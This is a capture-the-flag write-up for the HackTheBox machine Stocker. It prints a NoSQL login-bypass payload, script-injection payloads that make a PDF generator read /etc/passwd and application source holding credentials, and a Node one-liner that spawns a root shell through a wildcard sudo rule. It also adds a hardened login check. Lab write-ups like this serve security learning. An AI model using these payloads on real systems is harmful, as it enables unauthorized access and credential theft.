Stocker — HackTheBox

Abdul Wassay (HotPlugin)
4 min read · Jun 24, 2023

Stocker is an easy machine from HackTheBox. It involves bypassing authentication via NoSQL injection, exploiting HTML injection in PDF generation to read source code from the host containing credentials that leads to foothold. Finally, misconfigured sudo privilege allowing execution of NodeJS scripts leads to shell as root.

NMAP

PORT   STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 3d12971d86bc161683608f4f06e6d54e (RSA)
| 256 7c4d1a7868ce1200df491037f9ad174f (ECDSA)
|_ 256 dd978050a5bacd7d55e827ed28fdaa3b (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://stocker.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 80 (HTTP)

Add the domain stocker.htb in the /etc/hosts file and navigate to the website. It is just a static page.

Enumerating for subdomains, we find the subdomain dev.stocker.htb. Add this to the /etc/hosts file as well.

Navigating to the subdomain, it presents the following login page.

Trying some default credentials doesn’t work. However, the response headers and Wappalyzer give us the idea that this is an Express application.

After trying some SQL injection payloads, it came to me that the backend might be using MongoDB. So, instead I tried the following NoSQL injection payload, sending the body as JSON with the Content-Type: application/json header. And it worked.

{"username": {"$ne": null}, "password": {"$ne": null}}
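As an added example (not the box’s own application code), the following reproduces why that payload logs in when an Express handler passes the parsed JSON body straight into a MongoDB filter, and shows the input type check that stops it. A small in-memory matcher stands in for MongoDB’s findOne so it runs offline, and the user record is constructed.

```javascript
// Constructed sample user; a real app would store a password hash.
const users = [{ username: "admin", password: "placeholder-secret" }];

// Minimal stand-in for collection.findOne(filter): supports plain equality
// and the {$ne: value} operator, which is all the payload relies on.
function findOne(collection, filter) {
  const hit = collection.find((doc) =>
    Object.entries(filter).every(([field, cond]) => {
      if (cond !== null && typeof cond === "object" && "$ne" in cond) {
        // An operator object reached the query engine: "field != null"
        // is true for every stored user, so the filter matches.
        return doc[field] !== cond.$ne;
      }
      return doc[field] === cond;
    })
  );
  return hit === undefined ? null : hit;
}

// Vulnerable handler: req.body values are used as-is, so a client that
// sends objects such as {"$ne": null} where strings are expected wins.
function loginVulnerable(body) {
  const user = findOne(users, { username: body.username, password: body.password });
  return user !== null;
}

// Hardened handler: only accept strings, so operator objects never become
// part of the filter. Rejecting the request is the right outcome here.
function loginHardened(body) {
  const { username, password } = body;
  if (typeof username !== "string" || typeof password !== "string") {
    return false;
  }
  const user = findOne(users, { username, password });
  return user !== null;
}

// The payload from the writeup, as it arrives after express.json() parsing.
const injection = JSON.parse('{"username": {"$ne": null}, "password": {"$ne": null}}');
```

Logging a rejected non-string login field is also a cheap, high-signal detection for this class of probe.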

After that it presents the following page where we can add some items in the basket/cart, view them and submit the order.

After submitting the order, it gives the following modal to view the order detail.

And we can see our order details in a PDF file.

HTML Injection

After doing some research, it turns out that this is vulnerable to HTML injection, which can be escalated to local file reads because the PDF generator renders our HTML (including script) with access to the server’s filesystem. Looking at the order submit request, it can be seen that we control two fields that end up in the PDF.

We can try to inject HTML in these fields, and it successfully works on the title.

After doing some searching, I came across the following article, which explains the way to read files via HTML injection.

It used the following payload to read files from system.

<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open('GET','file:///etc/passwd');x.send();</script>

Injecting the payload in the title field:

We successfully read the /etc/passwd file from the server.

From here, we can see that there’s one user named angoose on the system. I couldn’t read its SSH private key. So, instead I read the source code of the application using the following payload and found some credentials in it.

<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open('GET','file:///var/www/dev/index.js');x.send();</script>

Reusing the password for the angoose user, we successfully log in via SSH.

Privilege Escalation

Checking for sudo privileges, it seems that we can run NodeJS scripts in the /usr/local/scripts directory.

Looking at the scripts directory, we don’t have write permissions on it. It also contains some scripts but they only have executable permissions.

However, after some searching, it turns out that because the sudo rule uses a wildcard, nothing stops path traversal: we can just enter ../../ to move out of /usr/local/scripts and execute any script we want.

So, I wrote the following NodeJS script to spawn a shell.

require("child_process").spawn("/bin/bash", ["-p"], {stdio: [0, 1, 2]})

Lastly, executing it with sudo, we get shell as root.
